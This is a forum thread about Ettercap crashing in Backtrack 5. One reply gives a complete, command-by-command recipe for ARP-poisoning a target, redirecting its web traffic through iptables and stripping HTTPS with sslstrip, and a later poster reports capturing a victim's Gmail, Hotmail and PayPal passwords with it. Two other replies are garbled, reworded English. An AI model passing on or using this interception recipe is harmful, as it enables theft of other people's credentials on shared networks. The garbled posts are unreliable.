|
| ||||||||||
| Tags: adobe flash, backtrack 5, ettercap, firefox, linux, synaptic, toshiba satellite p305, wireshark |
![]() |
| | Thread Tools | Search this Thread |
|
#1
| |||
| |||
| Backtrack 5- while scanning for active host, ettercap crashes
|
|
#2
| |||
| |||
| Re: Backtrack 5- while scanning for active host, ettercap crashes
Try following commands in your console .to fix this issue Code: sudo apt-get remove --purge ettercap-gtk sudo apt-get remove --purge ettercap-common sudo apt-get install ettercap-gtk |
|
#3
| |||
| |||
| Re: Backtrack 5- while scanning for active host, ettercap crashes
Must be configured to use the side ettercap command and report here is a little guide I wrote for help. Code: nano /etc/etter.conf hold shift + press w then t enter line 17 and you will see these lines you must change to 0 ec_uid = 65534 # nobody is the default ec_gid = 65534 # nobody is the default to this ec_uid = 0 # nobody is the default ec_gid = 0 # nobody is the default hold shift + press w then t type 1 then hold shift + press w then t type 168 and change the following lines #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" to this redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" press ctrl+x and y to save Code: echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 Code: ettercap -T -q -M ARP // // -i (interface) Code: ettercap -T -q -M ARP /gateway/ /target/ Code: netstat -nr Code: sslstrip -l 1000 -w capture.txt Code: sslstrip -k -f -l 10000 -w capture |
|
#4
| |||
| |||
| Re: Backtrack 5- while scanning for active host, ettercap crashes
Unfortunately. Ettercap-gtk does not work (inside my Satellite P305-S8823). I tried to boot commencing from the DVD to authenticate with the intention of at hand; it was a blunder I finished. Still rejection joy. I tried consecutively the identical disk on a different laptop (Satellite L645): Ettercap-gtk working fine! Conclusion –It has a hardware configuration difficulty. Almost certainly necessitate to set-up dissimilar drivers. |
|
#5
| ||||
| ||||
| Re: Backtrack 5- while scanning for active host, ettercap crashes
This is the primary occasion I installed Ettercap mint debian gnome 64 on my Linux partition. Using ettercap-G, would shut subsequent to scanning of hosts 9 out of 11 times I tried, following May gnome 64 installed Backtrack, still I have the indistinguishable difficulty. I believe there is a difficulty with Ettercap and 64-bit architecture or ettercap and gnome. I will become accomplished at to create use of the terminal in place, the graphical user interface that looked like a nice bonus. |
|
#6
| |||
| |||
| Re: Backtrack 5- while scanning for active host, ettercap crashes
In my pc it works! I find the username and password Ettercap after sniffing. Repeat only the problem that is "unsafe website" to me "victimxp," but if the victim does not accept insurance website come in passwords. I tried gmail, hotmail, paypal, Alice. If I'm not changing ec_uid and ec_gid (default etter.conf!) I do not know what to say!) Above information help me lot .I’m thankful to all above member. |
![]() |
|
| Thread Tools | Search this Thread |
| |
Similar Threads for: "Backtrack 5- while scanning for active host, ettercap crashes" | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| crashes with VMPlayer 3.0.0 causing X on host. | Swiz | Operating Systems | 4 | 12-09-2011 01:22 PM |
| Ettercap and sslstrip in backtrack 5 | GaganGang | Operating Systems | 4 | 18-06-2011 02:44 AM |
| Backtrack 4 on sun Virtual box Vista host usb adapter fail | Kaalicharan | Operating Systems | 6 | 10-05-2010 10:00 AM |
| Wolfenstein displays 'scanning for tools' errors and crashes | Javiier | Video Games | 5 | 15-02-2010 12:07 PM |
| Active Directory could not resolve DNS host name | shivendra | Active Directory | 4 | 12-07-2007 02:40 PM |